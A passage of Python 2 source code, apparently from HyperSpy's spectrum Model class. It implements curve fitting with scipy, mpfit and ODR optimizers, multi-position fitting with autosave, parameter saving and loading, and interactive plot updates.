if isinstance(active_s, bool):
component_.active = active_s
else:
if active_s == _multi_off_:
component_._toggle_connect_active_array(True)
return spectrum
@property
def _plot_active(self):
if self._plot is not None and self._plot.is_active() is True:
return True
else:
return False
def _set_p0(self):
self.p0 = ()
for component in self:
if component.active:
for parameter in component.free_parameters:
self.p0 = (self.p0 + (parameter.value,)
if parameter._number_of_elements == 1
else self.p0 + parameter.value)
def set_boundaries(self):
"""Generate the boundary list.
Necessary before fitting with a boundary aware optimizer.
"""
self.free_parameters_boundaries = []
for component in self:
if component.active:
for param in component.free_parameters:
if param._number_of_elements == 1:
self.free_parameters_boundaries.append((
param._bounds))
else:
self.free_parameters_boundaries.extend((
param._bounds))
def set_mpfit_parameters_info(self):
self.mpfit_parinfo = []
for component in self:
if component.active:
for param in component.free_parameters:
limited = [False, False]
limits = [0, 0]
if param.bmin is not None:
limited[0] = True
limits[0] = param.bmin
if param.bmax is not None:
limited[1] = True
limits[1] = param.bmax
if param._number_of_elements == 1:
self.mpfit_parinfo.append(
{'limited': limited,
'limits': limits})
else:
self.mpfit_parinfo.extend((
{'limited': limited,
'limits': limits},) * param._number_of_elements)
def store_current_values(self):
""" Store the parameters of the current coordinates into the
parameters array.
If the parameters array has not being defined yet it creates it filling
it with the current parameters."""
for component in self:
if component.active:
component.store_current_parameters_in_map()
def fetch_stored_values(self, only_fixed=False):
"""Fetch the value of the parameters that has been previously stored.
Parameters
----------
only_fixed : bool
If True, only the fixed parameters are fetched.
See Also
--------
store_current_values
"""
switch_aap = self._plot_active is not False
if switch_aap is True:
self._disconnect_parameters2update_plot()
for component in self:
component.fetch_stored_values(only_fixed=only_fixed)
if switch_aap is True:
self._connect_parameters2update_plot()
self.update_plot()
def update_plot(self, *args, **kwargs):
"""Update model plot.
The updating can be suspended using `suspend_update`.
See Also
--------
suspend_update
resume_update
"""
if self._plot_active is True and self._suspend_update is False:
try:
self._update_model_line()
for component in [component for component in self if
component.active is True]:
self._update_component_line(component)
except:
self._disconnect_parameters2update_plot()
def suspend_update(self):
"""Prevents plot from updating until resume_update() is called
See Also
--------
resume_update
update_plot
"""
if self._suspend_update is False:
self._suspend_update = True
self._disconnect_parameters2update_plot()
else:
warnings.warn("Update already suspended, does nothing.")
def resume_update(self, update=True):
"""Resumes plot update after suspension by suspend_update()
Parameters
----------
update : bool, optional
If True, also updates plot after resuming (default).
See Also
--------
suspend_update
update_plot
"""
if self._suspend_update is True:
self._suspend_update = False
self._connect_parameters2update_plot()
if update is True:
# Ideally, the update flag should in stead work like this:
# If update is true, update_plot is called if any action
# would have called it while updating was suspended.
# However, this is prohibitively difficult to track, so
# in stead it is simply assume that a change has happened
# between suspend and resume, and therefore that the plot
# needs to update. As we do not know what has changed,
# all components need to update. This can however be
# suppressed by setting update to false
self.update_plot()
else:
warnings.warn("Update not suspended, nothing to resume.")
def _update_model_line(self):
if (self._plot_active is True and
self._model_line is not None):
self._model_line.update()
def _fetch_values_from_p0(self, p_std=None):
"""Fetch the parameter values from the output of the optimzer `self.p0`
Parameters
----------
p_std : array
array containing the corresponding standard deviatio
n
"""
comp_p_std = None
counter = 0
for component in self: # Cut the parameters list
if component.active is True:
if p_std is not None:
comp_p_std = p_std[
counter: counter +
component._nfree_param]
component.fetch_values_from_array(
self.p0[counter: counter + component._nfree_param],
comp_p_std, onlyfree=True)
counter += component._nfree_param
# Defines the functions for the fitting process -------------------------
def _model2plot(self, axes_manager, out_of_range2nans=True):
old_axes_manager = None
if axes_manager is not self.axes_manager:
old_axes_manager = self.axes_manager
self.axes_manager = axes_manager
self.fetch_stored_values()
s = self.__call__(non_convolved=False, onlyactive=True)
if old_axes_manager is not None:
self.axes_manager = old_axes_manager
self.fetch_stored_values()
if out_of_range2nans is True:
ns = np.empty((self.axis.axis.shape))
ns.fill(np.nan)
ns[self.channel_switches] = s
s = ns
return s
def __call__(self, non_convolved=False, onlyactive=False):
"""Returns the corresponding model for the current coordinates
Parameters
----------
non_convolved : bool
If True it will return the deconvolved model
only_active : bool
If True, only the active components will be used to build the
model.
cursor: 1 or 2
Returns
-------
numpy array
"""
if self.convolved is False or non_convolved is True:
axis = self.axis.axis[self.channel_switches]
sum_ = np.zeros(len(axis))
if onlyactive is True:
for component in self: # Cut the parameters list
if component.active:
np.add(sum_, component.function(axis),
sum_)
else:
for component in self: # Cut the parameters list
np.add(sum_, component.function(axis),
sum_)
to_return = sum_
else: # convolved
counter = 0
sum_convolved = np.zeros(len(self.convolution_axis))
sum_ = np.zeros(len(self.axis.axis))
for component in self: # Cut the parameters list
if onlyactive:
if component.active:
if component.convolved:
np.add(sum_convolved,
component.function(
self.convolution_axis), sum_convolved)
else:
np.add(sum_,
component.function(self.axis.axis), sum_)
counter += component._nfree_param
else:
if component.convolved:
np.add(sum_convolved,
component.function(self.convolution_axis),
sum_convolved)
else:
np.add(sum_, component.function(self.axis.axis),
sum_)
counter += component._nfree_param
to_return = sum_ + np.convolve(
self.low_loss(self.axes_manager),
sum_convolved, mode="valid")
to_return = to_return[self.channel_switches]
if self.spectrum.metadata.Signal.binned is True:
to_return *= self.spectrum.axes_manager[-1].scale
return to_return
# TODO: the way it uses the axes
def _set_signal_range_in_pixels(self, i1=None, i2=None):
"""Use only the selected spectral range in the fitting routine.
Parameters
----------
i1 : Int
i2 : Int
Notes
-----
To use the full energy range call the function without arguments.
"""
self.backup_channel_switches = copy.copy(self.channel_switches)
self.channel_switches[:] = False
self.channel_switches[i1:i2] = True
self.update_plot()
@interactive_range_selector
def set_signal_range(self, x1=None, x2=None):
"""Use only the selected spectral range defined in its own units in the
fitting routine.
Parameters
----------
E1 : None or float
E2 : None or float
Notes
-----
To use the full energy range call the function without arguments.
"""
i1, i2 = self.axis.value_range_to_indices(x1, x2)
self._set_signal_range_in_pixels(i1, i2)
def _remove_signal_range_in_pixels(self, i1=None, i2=None):
"""Removes the data in the given range from the data range that
will be used by the fitting rountine
Parameters
----------
x1 : None or float
x2 : None or float
"""
self.channel_switches[i1:i2] = False
self.update_plot()
@interactive_range_selector
def remove_signal_range(self, x1=None, x2=None):
"""Removes the data in the given range from the data range that
will be used by the fitting rountine
Parameters
----------
x1 : None or float
x2 : None or float
"""
i1, i2 = self.axis.value_range_to_indices(x1, x2)
self._remove_signal_range_in_pixels(i1, i2)
def reset_signal_range(self):
'''Resets the data range'''
self._set_signal_range_in_pixels()
def _add_signal_range_in_pixels(self, i1=None, i2=None):
"""Adds the data in the given range from the data range that
will be used by the fitting rountine
Parameters
----------
x1 : None or float
x2 : None or float
"""
self.channel_switches[i1:i2] = True
self.update_plot()
@interactive_range_selector
def add_signal_range(self, x1=None, x2=None):
"""Adds the data in the given range from the data range that
will be used by the fitting rountine
Parameters
----------
x1 : None or float
x2 : None or float
"""
i1, i2 = self.axis.value_range_to_indices(x1, x2)
self._add_signal_range_in_pixels(i1, i2)
def reset_the_signal_range(self):
self.channel_switches[:] = True
self.update_plot()
def _model_function(self, param):
if self.convolved is True:
counter = 0
sum_convolved = np.zeros(len(self.convolution_axis))
sum = np.zeros(len(self.axis.axis))
for component in self: # Cut the parameters list
if component.active:
if component.convolved is True:
np.add(sum_convolved, component.__tempcall__(param[
counter:counter + component._nfree_param],
self.convolution_axis), sum_convolved)
else:
np.add(
sum,
component.__tempcall__(
param[
counter:counter +
component._nfree_param],
self.axis.axis),
sum)
counter += component._nfree_param
to_return = (sum + np.convolve(self.low_loss(self.axes_manager),
sum_convolved, mode="valid"))[
self.channel_switches]
else:
axis = self.axis.axis[self.channel_switches]
counter = 0
first = True
for component in self: # Cut the parameters list
if component.active:
if first is True:
sum = component.__tempcall__(
param[
counter:counter +
component._nfree_param],
axis)
first = False
else:
sum += component.__tempcall__(
param[
counter:counter +
component._nfree_param],
axis)
counter += component._nfree_param
to_return = sum
if self.spectrum.metadata.Signal.binned is True:
to_return *= self.spectrum.axes_manager[-1].scale
return to_return
def _jacobian(self, param, y, weights=None):
if self.convolved is True:
counter = 0
grad = np.zeros(len(self.axis.axis))
for component in self: # Cut the parameters list
if component.active:
component.fetch_values_from_array(
param[
counter:counter +
component._nfree_param],
onlyfree=True)
if component.convolved:
for parameter in component.free_parameters:
par_grad = np.convolve(
parameter.grad(self.convolution_axis),
self.low_loss(self.axes_manager),
mode="valid")
if parameter._twins:
for parameter in parameter._twins:
np.add(par_grad, np.convolve(
parameter.grad(
self.convolution_axis),
self.low_loss(self.axes_manager),
mode="valid"), par_grad)
grad = np.vstack((grad, par_grad))
counter += component._nfree_param
else:
for parameter in component.free_parameters:
par_grad = parameter.grad(self.axis.axis)
if parameter._twins:
for parameter in parameter._twins:
np.add(par_grad, parameter.grad(
self.axis.axis), par_grad)
grad = np.vstack((grad, par_grad))
counter += component._nfree_param
if weights is None:
to_return = grad[1:, self.channel_switches]
else:
to_return = grad[1:, self.channel_switches] * weights
else:
axis = self.axis.axis[self.channel_switches]
counter = 0
grad = axis
for component in self: # Cut the parameters list
if component.active:
component.fetch_values_from_array(
param[
counter:counter +
component._nfree_param],
onlyfree=True)
for parameter in component.free_parameters:
par_grad = parameter.grad(axis)
if parameter._twins:
for parameter in parameter._twins:
np.add(par_grad, parameter.grad(
axis), par_grad)
grad = np.vstack((grad, par_grad))
counter += component._nfree_param
if weights is None:
to_return = grad[1:, :]
else:
to_return = grad[1:, :] * weights
if self.spectrum.metadata.Signal.binned is True:
to_return *= self.spectrum.axes_manager[-1].scale
return to_return
def _function4odr(self, param, x):
return self._model_function(param)
def _jacobian4odr(self, param, x):
return self._jacobian(param, x)
def _poisson_likelihood_function(self, param, y, weights=None):
"""Returns the likelihood function of the model for the given
data and parameters
"""
mf = self._model_function(param)
with np.errstate(invalid='ignore'):
return -(y * np.log(mf) - mf).sum()
def _gradient_ml(self, param, y, weights=None):
mf = self._model_function(param)
return -(self._jacobian(param, y) * (y / mf - 1)).sum(1)
def _errfunc(self, param, y, weights=None):
errfunc = self._model_function(param) - y
if weights is None:
return errfunc
else:
return errfunc * weights
def _errfunc2(self, param, y, weights=None):
if weights is None:
return ((self._errfunc(param, y)) ** 2).sum()
else:
return ((weights * self._errfunc(param, y)) ** 2).sum()
def _gradient_ls(self, param, y, weights=None):
gls = (2 * self._errfunc(param, y, weights) *
self._jacobian(param, y)).sum(1)
return gls
def _errfunc4mpfit(self, p, fjac=None, x=None, y=None,
weights=None):
if fjac is None:
errfunc = self._model_function(p) - y
if weights is not None:
errfunc *= weights
status = 0
return [status, errfunc]
else:
return [0, self._jacobian(p, y).T]
def _calculate_chisq(self):
if self.spectrum.metadata.has_item('Signal.Noise_properties.variance'):
variance = self.spectrum.metadata.Signal.Noise_properties.variance
if isinstance(variance, Signal):
variance = variance.data.__getitem__(
self.spectrum.axes_manager._getitem_tuple
)[self.channel_switches]
else:
variance = 1.0
d = self(onlyactive=True) - self.spectrum()[self.channel_switches]
d *= d / (1. * variance) # d = difference^2 / variance.
self.chisq.data[self.spectrum.axes_manager.indices[::-1]] = sum(d)
def _set_current_degrees_of_freedom(self):
self.dof.data[self.spectrum.axes_manager.indices[::-1]] = len(self.p0)
@property
def red_chisq(self):
"""Reduced chi-squared. Calculated from self.chisq and self.dof
"""
tmp = self.chisq / (- self.dof + sum(self.channel_switches) - 1)
tmp.metadata.General.title = self.spectrum.metadata.General.title + \
' reduced chi-squared'
return tmp
def fit(self, fitter=None, method='ls', grad=False,
bounded=False, ext_bounding=False, update_plot=False,
**kwargs):
"""Fits the model to the experimental data.
The chi-squared, reduced chi-squared and the degrees of freedom are
computed automatically when fitting. They are stored as signals, in the
`chisq`, `red_chisq` and `dof`. Note that,
unless ``metadata.Signal.Noise_properties.variance`` contains an
accurate estimation of the variance of the data, the chi-squared and
reduced chi-squared cannot be computed correctly. This is also true for
homocedastic noise.
Parameters
----------
fitter : {None, "leastsq", "odr", "mpfit", "fmin"}
The optimizer to perform the fitting. If None the fitter
defined in `preferences.Model.default_fitter` is used.
"leastsq" performs least squares using the Levenberg–Marquardt
algorithm.
"mpfit" performs least squares using the Levenberg–Marquardt
algorithm and, unlike "leastsq", support bounded optimization.
"fmin" performs curve fitting using a downhill simplex algorithm.
It is less robust than the Levenberg-Marquardt based optimizers,
but, at present, it is the only one that support maximum likelihood
optimization for poissonian noise.
"odr" performs the optimization using the orthogonal distance
regression algorithm. It does not support bounds.
"leastsq", "odr" and "mpfit" can estimate the standard deviation of
the estimated value of the parameters if the
"metada.Signal.Noise_properties.variance" attribute is defined.
Note that if it is not defined the standard deviation is estimated
using variance equal 1, what, if the noise is heterocedatic, will
result in a biased estimation of the parameter values and errors.i
If `variance` is a `Signal` instance of the
same `navigation_dimension` as the spectrum, and `method` is "ls"
weighted least squares is performed.
method : {'ls', 'ml'}
Choose 'ls' (default) for least squares and 'ml' for poissonian
maximum-likelihood estimation. The latter is only available when
`fitter` is "fmin".
grad : bool
If True, the analytical gradient is used if defined to
speed up the optimization.
bounded : bool
If True performs bounded optimization if the fitter
supports it. Currently only "mpfit" support it.
update_plot : bool
If True, the plot is updated during the optimization
process. It slows down the optimization but it permits
to visualize the optimization progress.
ext_bounding : bool
If True, enforce bounding by keeping the value of the
parameters constant out of the defined bounding area.
**kwargs : key word arguments
Any extra key word argument will be passed to the chosen
fitter. For more information read the docstring of the optimizer
of your choice in `scipy.optimize`.
See Also
--------
multifit
"""
if fitter is None:
fitter = preferences.Model.default_fitter
switch_aap = (update_plot != self._plot_active)
if switch_aap is True and update_plot is False:
self._disconnect_parameters2update_plot()
self.p_std = None
self._set_p0()
if ext_bounding:
self._enable_ext_bounding()
if grad is False:
approx_grad = True
jacobian = None
odr_jacobian = None
grad_ml = None
grad_ls = None
else:
approx_grad = False
jacobian = self._jacobian
odr_jacobian = self._jacobian4odr
grad_ml = self._gradient_ml
grad_ls = self._gradient_ls
if bounded is True and fitter not in ("mpfit", "tnc", "l_bfgs_b"):
raise NotImplementedError("Bounded optimization is only available "
"for the mpfit optimizer.")
if method == 'ml':
weights = None
if fitter != "fmin":
raise NotImplementedError("Maximum likelihood estimation "
'is only implemented for the "fmin" '
'optimizer')
elif method == "ls":
if ("Signal.Noise_properties.variance" not in
self.spectrum.metadata):
variance = 1
else:
variance = self.spectrum.metadata.Signal.\
Noise_properties.variance
if isinstance(variance, Signal):
if (variance.axes_manager.navigation_shape ==
self.spectrum.axes_manager.navigation_shape):
variance = variance.data.__getitem__(
self.axes_manager._getitem_tuple)[
self.channel_switches]
else:
raise AttributeError(
"The `navigation_shape` of the variance signals "
"is not equal to the variance shape of the "
"spectrum")
elif not isinstance(variance, numbers.Number):
raise AttributeError(
"Variance must be a number or a `Signal` instance but "
"currently it is a %s" % type(variance))
weights = 1. / np.sqrt(variance)
else:
raise ValueError(
'method must be "ls" or "ml" but %s given' %
method)
args = (self.spectrum()[self.channel_switches],
weights)
# Least squares "dedicated" fitters
if fitter == "leastsq":
output = \
leastsq(self._errfunc, self.p0[:], Dfun=jacobian,
col_deriv=1, args=args, full_output=True, **kwargs)
self.p0, pcov = output[0:2]
if (self.axis.size > len(self.p0)) and pcov is not None:
pcov *= ((self._errfunc(self.p0, *args) ** 2).sum() /
(len(args[0]) - len(self.p0)))
self.p_std = np.sqrt(np.diag(pcov))
self.fit_output = output
elif fitter == "odr":
modelo = odr.Model(fcn=self._function4odr,
fjacb=odr_jacobian)
mydata = odr.RealData(
self.axis.axis[
self.channel_switches], self.spectrum()[
self.channel_switches], sx=None, sy=(
1 / weights if weights is not None else None))
myodr = odr.ODR(mydata, modelo, beta0=self.p0[:])
myoutput = myodr.run()
result = myoutput.beta
self.p_std = myoutput.sd_beta
self.p0 = result
self.fit_output = myoutput
elif fitter == 'mpfit':
autoderivative = 1
if grad is True:
autoderivative = 0
if bounded is True:
self.set_mpfit_parameters_info()
elif bounded is False:
self.mpfit_parinfo = None
m = mpfit(self._errfunc4mpfit, self.p0[:],
parinfo=self.mpfit_parinfo, functkw={
'y': self.spectrum()[self.channel_switches],
'weights': weights}, autoderivative=autoderivative,
quiet=1)
self.p0 = m.params
if (self.axis.size > len(self.p0)) and m.perror is not None:
self.p_std = m.perror * np.sqrt(
(self._errfunc(self.p0, *args) ** 2).sum() /
(len(args[0]) - len(self.p0)))
self.fit_output = m
else:
# General optimizers (incluiding constrained ones(tnc,l_bfgs_b)
# Least squares or maximum likelihood
if method == 'ml':
tominimize = self._poisson_likelihood_function
fprime = grad_ml
elif method in ['ls', "wls"]:
tominimize = self._errfunc2
fprime = grad_ls
# OPTIMIZERS
# Simple (don't use gradient)
if fitter == "fmin":
self.p0 = fmin(
tominimize, self.p0, args=args, **kwargs)
elif fitter == "powell":
self.p0 = fmin_powell(tominimize, self.p0, args=args,
**kwargs)
# Make use of the gradient
elif fitter == "cg":
self.p0 = fmin_cg(tominimize, self.p0, fprime=fprime,
args=args, **kwargs)
elif fitter == "ncg":
self.p0 = fmin_ncg(tominimize, self.p0, fprime=fprime,
args=args, **kwargs)
elif fitter == "bfgs":
self.p0 = fmin_bfgs(
tominimize, self.p0, fprime=fprime,
args=args, **kwargs)
# Constrainded optimizers
# Use gradient
elif fitter == "tnc":
if bounded is True:
self.set_boundaries()
elif bounded is False:
self.self.free_parameters_boundaries = None
self.p0 = fmin_tnc(
tominimize,
self.p0,
fprime=fprime,
args=args,
bounds=self.free_parameters_boundaries,
approx_grad=approx_grad,
**kwargs)[0]
elif fitter == "l_bfgs_b":
if bounded is True:
self.set_boundaries()
elif bounded is False:
self.self.free_parameters_boundaries = None
self.p0 = fmin_l_bfgs_b(tominimize, self.p0,
fprime=fprime, args=args,
bounds=self.free_parameters_boundaries,
approx_grad=approx_grad, **kwargs)[0]
else:
print \
"""
The %s optimizer is not available.
Available optimizers:
Unconstrained:
--------------
Only least Squares: leastsq and odr
General: fmin, powell, cg, ncg, bfgs
Cosntrained:
------------
tnc and l_bfgs_b
""" % fitter
if np.iterable(self.p0) == 0:
self.p0 = (self.p0,)
self._fetch_values_from_p0(p_std=self.p_std)
self.store_current_values()
self._calculate_chisq()
self._set_current_degrees_of_freedom()
if ext_bounding is True:
self._disable_ext_bounding()
if switch_aap is True and update_plot is False:
self._connect_parameters2update_plot()
self.update_plot()
def multifit(self, mask=None, fetch_only_fixed=False,
autosave=False, autosave_every=10, show_progressbar=None,
**kwargs):
"""Fit the data to the model at all the positions of the
navigation dimensions.
Parameters
----------
mask : {None, numpy.array}
To mask (do not fit) at certain position pass a numpy.array
of type bool where True indicates that the data will not be
fitted at the given position.
fetch_only_fixed : bool
If True, only the fixed parameters values will be updated
when changing the positon.
autosave : bool
If True, the result of the fit will be saved automatically
with a frequency defined by autosave_every.
autosave_every : int
Save the result of fitting every given number of spectra.
show_progressbar : None or bool
If True, display a progress bar. If None the default is set in
`preferences`.
**kwargs : key word arguments
Any extra key word argument will be passed to
the fit method. See the fit method documentation for
a list of valid arguments.
See Also
--------
fit
"""
if show_progressbar is None:
show_progressbar = preferences.General.show_progressbar
if autosave is not False:
fd, autosave_fn = tempfile.mkstemp(
prefix='hyperspy_autosave-',
dir='.', suffix='.npz')
os.close(fd)
autosave_fn = autosave_fn[:-4]
messages.information(
"Autosaving each %s pixels to %s.npz" % (autosave_every,
autosave_fn))
messages.information(
"When multifit finishes its job the file will be deleted")
if mask is not None and (
mask.shape != tuple(
self.axes_manager._navigation_shape_in_array)):
messages.warning_exit(
"The mask must be a numpy array of boolen type with "
" shape: %s" +
str(self.axes_manager._navigation_shape_in_array))
masked_elements = 0 if mask is None else mask.sum()
maxval = self.axes_manager.navigation_size - masked_elements
if maxval > 0:
pbar = progressbar.progressbar(maxval=maxval,
disabled=not show_progressbar)
if 'bounded' in kwargs and kwargs['bounded'] is True:
if kwargs['fitter'] == 'mpfit':
self.set_mpfit_parameters_info()
kwargs['bounded'] = None
elif kwargs['fitter'] in ("tnc", "l_bfgs_b"):
self.set_boundaries()
kwargs['bounded'] = None
else:
messages.information(
"The chosen fitter does not suppport bounding."
"If you require bounding please select one of the "
"following fitters instead: mpfit, tnc, l_bfgs_b")
kwargs['bounded'] = False
i = 0
self.axes_manager.disconnect(self.fetch_stored_values)
for index in self.axes_manager:
if mask is None or not mask[index[::-1]]:
self.fetch_stored_values(only_fixed=fetch_only_fixed)
self.fit(**kwargs)
i += 1
if maxval > 0:
pbar.update(i)
if autosave is True and i % autosave_every == 0:
self.save_parameters2file(autosave_fn)
if maxval > 0:
pbar.finish()
self.axes_manager.connect(self.fetch_stored_values)
if autosave is True:
messages.information(
'Deleting the temporary file %s pixels' % (
autosave_fn + 'npz'))
os.remove(autosave_fn + '.npz')
def save_parameters2file(self, filename):
"""Save the parameters array in binary format.
The data is saved to a single file in numpy's uncompressed ``.npz``
format.
Parameters
----------
filename : str
See Also
--------
load_parameters_from_file, export_results
Notes
-----
This method can be used to save the current state of the model in a way
that can be loaded back to recreate the it using `load_parameters_from
file`. Actually, as of HyperSpy 0.8 this is the only way to do so.
However, this is known to be brittle. For example see
https://github.com/hyperspy/hyperspy/issues/341.
"""
kwds = {}
i = 0
for component in self:
cname = component.name.lower().replace(' ', '_')
for param in component.parameters:
pname = param.name.lower().replace(' ', '_')
kwds['%s_%s.%s' % (i, cname, pname)] = param.map
i += 1
np.savez(filename, **kwds)
def load_parameters_from_file(self, filename):
"""Loads the parameters array from a binary file written with the
'save_parameters2file' function.
Parameters
---------
filename : str
See Also
--------
save_parameters2file, export_results
Notes
-----
In combination with `save_parameters2file`, this method can be used to
recreate a model stored in a file. Actually, before HyperSpy 0.8 this
is the only way to do so. However, this is known to be brittle. For
example see https://github.com/hyperspy/hyperspy/issues/341.
"""
f = np.load(filename)
i = 0
for component in self: # Cut the parameters list
cname = component.name.lower().replace(' ', '_')
for param in component.parameters:
pname = param.name.lower().replace(' ', '_')
param.map = f['%s_%s.%s' % (i, cname, pname)]
i += 1
self.fetch_stored_values()
def plot(self, plot_components=False):
"""Plots the current spectrum to the screen and a map with a
cursor to explore the SI.
Parameters
----------
plot_components : bool
If True, add a line per component to the signal figure.
"""
# If new coordinates are assigned
self.spectrum.plot()
_plot = self.spectrum._plot
l1 = _plot.signal_plot.ax_lines[0]
color = l1.line.get_color()
l1.set_line_properties(color=color, type='scatter')
l2 = hyperspy.drawing.spectrum.SpectrumLine()
l2.data_function = self._model2plot
l2.set_line_properties(color='blue', type='line')
# Add the line to the figure
_plot.signal_plot.add_line(l2)
l2.plot()
on_figure_window_close(_plot.signal_plot.figure,
self._close_plot)
self._model_line = l2
self._plot = self.spectrum._plot
self._connect_parameters2update_plot()
if plot_components is True:
self.enable_plot_components()
def _connect_component_line(self, component):
if hasattr(component, "_model_plot_line"):
component.connect(component._model_plot_line.update)
for parameter in component.parameters:
parameter.connect(component._model_plot_line.update)
def _disconnect_component_line(self, component):
if hasattr(component, "_model_plot_line"):
component.disconnect(component._model_plot_line.update)
for parameter in component.parameters:
parameter.disconnect(component._model_plot_line.update)
def _connect_component_lines(self):
for component in [component for component in self if
component.active]:
self._connect_component_line(component)
def _disconnect_component_lines(self):
for component in [component for component in self if
component.active]:
self._disconnect_component_line(component)
def _plot_component(self, component):
line = hyperspy.drawing.spectrum.SpectrumLine()
line.data_function = component._component2plot
# Add the line to the figure
self._plot.signal_plot.add_line(line)
line.plot()
component._model_plot_line = line
self._connect_component_line(component)
def _update_component_line(self, component):
if hasattr(component, "_model_plot_line"):
component._model_plot_line.update()
def _disable_plot_component(self, component):
self._disconnect_component_line(component)
if hasattr(component, "_model_plot_line"):
component._model_plot_line.close()
del component._model_plot_line
self._plot_components = False
def _close_plot(self):
if self._plot_components is True:
self.disable_plot_components()
self._disconnect_parameters2update_plot()
self._model_line = None
def enable_plot_components(self):
if self._plot is None or self._plot_components:
return
self._plot_components = True
for component in [component for component in self if
component.active]:
self._plot_component(component)
def disable_plot_components(self):
if self._plot is None:
return
for component in self:
self._disable_plot_component(component)
self._plot_components = False
def assign_current_values_to_all(self, components_list=None, mask=None):
"""Set parameter values for all positions to the current ones.
Parameters
----------
component_list : list of components, optional
If a list of components is given, the operation will be performed
only in the value of the parameters of the given components.
The components can be specified by name, index or themselves.
mask : boolean numpy array or None, optional
The operation won't be performed where mask is True.
"""
if components_list is None:
components_list = []
for comp in self:
if comp.active:
components_list.append(comp)
else:
components_list = [self._get_component(x) for x in components_list]
for comp in components_list:
for parameter in comp.parameters:
parameter.assign_current_value_to_all(mask=mask)
def _enable_ext_bounding(self, components=None):
"""
"""
if components is None:
components = self
for component in components:
for parameter in component.parameters:
parameter.ext_bounded = True
def _disable_ext_bounding(self, components=None):
"""
"""
if components is None:
components = self
for component in components:
for parameter in component.parameters:
parameter.ext_bounded = False
def export_results(self, folder=None, format=None, save_std=False,
only_free=True, only_active=True):
"""Export the results of the parameters of the model to the desired
folder.
Parameters
----------
folder : str or None
The path to the folder where the file will be saved. If `None` the
current folder is used by default.
format : str
The format to which the data will be exported. It must be the
extension of any format supported by HyperSpy. If None, the default
format for exporting as defined in the `Preferences` will be used.
save_std : bool
If True, also the standard deviation will be saved.
only_free : bool
If True, only the value of the parameters that are free will be
exported.
only_active : bool
If True, only the value of the active parameters will be exported.
Notes
-----
The name of the files will be determined by each the Component and
each Parameter name attributes. Therefore, it is possible to customise
the file names modify the name attributes.
"""
for component in self:
if only_active is False or component.active:
component.export(folder=folder, format=format,
save_std=save_std, only_free=only_free)
def plot_results(self, only_free=True, only_active=True):
"""Plot the value of the parameters of the model
Parameters
----------
only_free : bool
If True, only the value of the parameters that are free will be
plotted.
only_active : bool
If True, only the value of the active parameters will be plotted.
Notes
-----
The name of the files will be determined by each the Component and
each Parameter name attributes. Therefore, it is possible to customise
the file names modify the name attributes.
"""
for component in self:
if only_active is False or component.active:
component.plot(only_free=only_free)
def print_current_values(self, only_free=True):
"""Print the value of each parameter of the model.
Parameters
----------
only_free : bool
If True, only the value of the parameters that are free will
be printed.
"""
print "Components\tParameter\tValue"
for component in self:
if component.active:
if component.name:
print(component.name)
else:
print(component._id_name)
parameters = component.free_parameters if only_free \
else component.parameters
for parameter in parameters:
if not hasattr(parameter.value, '__iter__'):
print("\t\t%s\t%g" % (
parameter.name, parameter.value))
def enable_adjust_position(
self, components=None, fix_them=True, show_label=True):
"""Allow changing the *x* position of component by dragging
a vertical line that is plotted in the signal model figure
Parameters
----------
components : {None, list of components}
If None, the position of all the active components of the
model that has a well defined *x* position with a value
in the axis range will get a position adjustment line.
Otherwise the feature is added only to the given components.
The components can be specified by name, index or themselves.
fix_them : bool
If True the position parameter of the components will be
temporarily fixed until adjust position is disable.
This can
be useful to iteratively adjust the component positions and
fit the model.
show_label : bool, optional
If True, a label showing the component name is added to the
plot next to the vertical line.
See also
--------
disable_adjust_position
"""
if (self._plot is None or
self._plot.is_active() is False):
self.plot()
if self._position_widgets:
self.disable_adjust_position()
on_figure_window_close(self._plot.signal_plot.figure,
self.disable_adjust_position)
if components:
components = [self._get_component(x) for x in components]
else:
self._adjust_position_all = (fix_them, show_label)
components = components if components else self
if not components:
# The model does not have components so we do nothing
return
components = [
component for component in components if component.active]
for component in components:
self._make_position_adjuster(component, fix_them, show_label)
def _make_position_adjuster(self, component, fix_it, show_label):
if (component._position is not None and
not component._position.twin):
set_value = component._position._set_value
get_value = component._position._get_value
else:
return
# Create an AxesManager for the widget
axis_dict = self.axes_manager.signal_axes[0].get_axis_dictionary()
am = AxesManager([axis_dict, ])
am._axes[0].navigate = True
try:
am._axes[0].value = get_value()
except TraitError:
# The value is outside of the axis range
return
# Create the vertical line and labels
if show_label:
self._position_widgets.extend((
DraggableVerticalLine(am),
DraggableLabel(am),))
# Store the component for bookkeeping, and to reset
# its twin when disabling adjust position
self._position_widgets[-2].component = component
self._position_widgets[-1].component = component
w = self._position_widgets[-1]
w.string = component._get_short_description().replace(
' component', '')
w.set_mpl_ax(self._plot.signal_plot.ax)
self._position_widgets[-2].set_mpl_ax(
self._plot.signal_plot.ax)
else:
self._position_widgets.extend((
DraggableVerticalLine(am),))
# Store the component for bookkeeping, and to reset
# its twin when disabling adjust position
self._position_widgets[-1].component = component
self._position_widgets[-1].set_mpl_ax(
self._plot.signal_plot.ax)
# Create widget -> parameter connection
am._axes[0].continuous_value = True
am._axes[0].on_trait_change(set_value, 'value')
# Create parameter -> widget connection
# This is done with a duck typing trick
# We disguise the AxesManager axis of Parameter by adding
# the _twin attribute
am._axes[0]._twins = set()
component._position.twin = am._axes[0]
def disable_adjust_position(self):
"""Disables the interactive adjust position feature
See also
--------
enable_adjust_position
"""
self._adjust_position_all = False
while self._position_widgets:
pw = self._position_widgets.pop()
if hasattr(pw, 'component'):
pw.component._position.twin = None
del pw.component
pw.close()
del pw
def fit_component(
self,
component,
signal_range="interactive",
estimate_parameters=True,
fit_independent=False,
**kwargs):
"""Fit just the given component in the given signal range.
This method is useful to obtain starting parameters for the
components. Any keyword arguments are passed to the fit method.
Parameters
----------
component : component instance
The component must be in the model, otherwise an exception
is raised. The component can be specified by name, index or itself.
signal_range : {'interactive', (left_value, right_value), None}
If 'interactive' the signal range is selected using the span
selector on the spectrum plot. The signal range can also
be manually specified by passing a tuple of floats. If None
the current signal range is used.
estimate_parameters : bool, default True
If True will check if the component has an
estimate_parameters function, and use it to estimate the
parameters in the component.
fit_independent : bool, default False
If True, all other components are disabled. If False, all other
component paramemeters are fixed.
Examples
--------
Signal range set interactivly
>>> g1 = components.Gaussian()
>>> m.append(g1)
>>> m.fit_component(g1)
Signal range set through direct input
>>> m.fit_component(g1, signal_range=(50,100))
"""
component = self._get_component(component)
cf = ComponentFit(self, component, signal_range,
estimate_parameters, fit_independent, **kwargs)
if signal_range == "interactive":
cf.edit_traits()
else:
cf.apply()
def set_parameters_not_free(self, component_list=None,
parameter_name_list=None):
"""
Sets the parameters in a component in a model to not free.
Parameters
----------
